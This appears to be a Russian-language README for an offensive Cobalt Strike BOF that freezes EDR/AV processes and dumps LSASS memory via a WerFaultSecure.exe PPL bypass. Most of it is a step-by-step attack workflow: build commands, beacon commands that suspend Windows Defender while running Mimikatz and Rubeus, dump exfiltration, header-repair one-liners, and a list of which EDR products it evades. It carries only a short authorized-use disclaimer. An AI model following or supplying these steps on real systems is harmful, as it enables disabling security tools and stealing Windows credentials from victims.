
Cobalt Strike BOF для заморозки процессов EDR/AV и дампа LSASS с использованием обхода PPL через WerFaultSecure.exe
Холодная война на вашем конечном устройстве.
ColdWer использует обход PPL через WerFaultSecure.exe, чтобы заморозить процессы EDR/AV и выполнить дамп памяти LSASS на современных системах Windows.
C O L D W E R
└─┴─┴── WerFaultSecure
└─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)
Заморозьте ваш EDR/AV. Извлеките то, что нужно. Оставайтесь холодными.
Sh3llf1r3 (@0xsh3llf1r3)
Этот проект основан на исследованиях TwoSevenOneT (@TwoSevenOneT):
| Project | Description |
|---|---|
| EDR-Freeze | Оригинальная техника заморозки EDR |
| WSASS | Дамп LSASS через WerFaultSecure |
Вся заслуга за основные техники принадлежит TwoSevenOneT.
git clone https://github.com/0xsh3llf1r3/ColdWer.git
cw/coldwer.cna# Перейдите в директорию исходников
cd src/
# Скомпилируйте BOF (требуется MinGW)
make
# Или вручную:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o
coldwer.o и coldwer.cnacoldwer.cna в Cobalt Strike# Найдите PID Windows Defender
beacon> ps
# Заморозьте процесс
beacon> cw-freeze 1337
# Выполните свои команды, пока EDR/AV заморожен
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage
# Разморозьте, когда закончите
beacon> cw-unfreeze
# Шаг 1: Загрузите WerFaultSecure.exe из Win8.1
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe
# Шаг 2: Найдите PID LSASS
beacon> ps
# Шаг 3: Выполните дамп LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe
# Шаг 4: Скачайте дамп
beacon> download C:\Windows\Temp\lsass.dmp
Измените заголовок файла, чтобы восстановить формат minidump:
| Original (PNG) | Change to (MDMP) |
|---|---|
89 50 4E 47 | 4D 44 4D 50 |
Команды для восстановления заголовка:
| Method | Command |
|---|---|
| Python | open('lsass.dmp','r+b').write(b'MDMP') |
| Bash | printf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc |
| PowerShell | $f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close() |
Затем проанализируйте с помощью Mimikatz:
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords
| Command | Description |
|---|---|
cw-freeze <PID> [Path] | Заморозить процесс |
cw-unfreeze | Разморозить ранее замороженный процесс |
cw-dump <PID> <Path> | Выполнить дамп памяти LSASS |
# Заморозка с путём по умолчанию
beacon> cw-freeze 1337
# Использовать пользовательский WerFaultSecure.exe
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe
# Дамп LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe
# Разморозка, когда закончите
beacon> cw-unfreeze
| Target | Status |
|---|---|
| Windows Defender (MsMpEng.exe) | ✅ Работает |
| LSASS (lsass.exe) | ✅ Работает |
| Other PPL processes | ✅ Работает |
НЕ работает против EDR с самозащитой на уровне ядра:
| EDR | Status |
|---|---|
| Elastic Endpoint | ❌ Заблокировано |
| CrowdStrike Falcon | ❌ Заблокировано |
| SentinelOne | ❌ Заблокировано |
| Carbon Black | ❌ Заблокировано |
1. 🚀 Запуск WerFaultSecure.exe как PPL (уровень WinTcb)
↓
2. 🎯 WerFaultSecure подключается к целевому процессу
↓
3. ⏸️ MiniDumpWriteDump приостанавливает все потоки целевого процесса
↓
4. 🥶 Приостановка самого WerFaultSecure → Цель остаётся замороженной
↓
5. ✅ Выполнение ваших команд (EDR/AV не видит!)
↓
6. 🔥 Завершение WerFaultSecure → Цель размораживается
| Version | Output |
|---|---|
| Windows 10/11 | Только зашифрованный дамп |
| Windows 8.1 | Сырой незашифрованный дамп |
⚠️ FOR AUTHORIZED SECURITY TESTING ONLY
This tool is intended for:
- Authorized penetration testing
- Red team operations with written permission
- Security research in controlled environments
The author is not responsible for any misuse or damage caused by this tool.
Unauthorized access to computer systems is illegal.
MIT License - См. LICENSE
🥶 Оставайтесь холодными. Оставайтесь тихими. 🥶
⭐ Поставьте звезду этому репозиторию, если он полезен! ⭐
| Feature | Description |
|---|
| ❄️ Заморозка | Переводит процессы EDR/AV в состояние комы |
| 🔓 Дамп | Извлекает память LSASS в обход PPL |
| 🛡️ Обход PPL | Использует WerFaultSecure.exe на уровне WinTcb |
| ⚡ Быстро | Выполнение встроенного BOF |
| 🎯 Ручное управление | Вы решаете, когда заморозить и разморозить |
| Error | Cause | Solution |
|---|
| File not found | Invalid path | Check WerFaultSecure.exe path |
| Access denied | Low privileges | Run as Administrator/SYSTEM |
| Invalid signature | Unsigned binary | Use properly signed WerFaultSecure.exe |
| Process does not exist | Wrong PID | Verify PID with ps command |
| Target protected | Kernel protection | EDR has self-protection (not bypassable) |
| Already frozen | State stuck | Run cw-unfreeze first |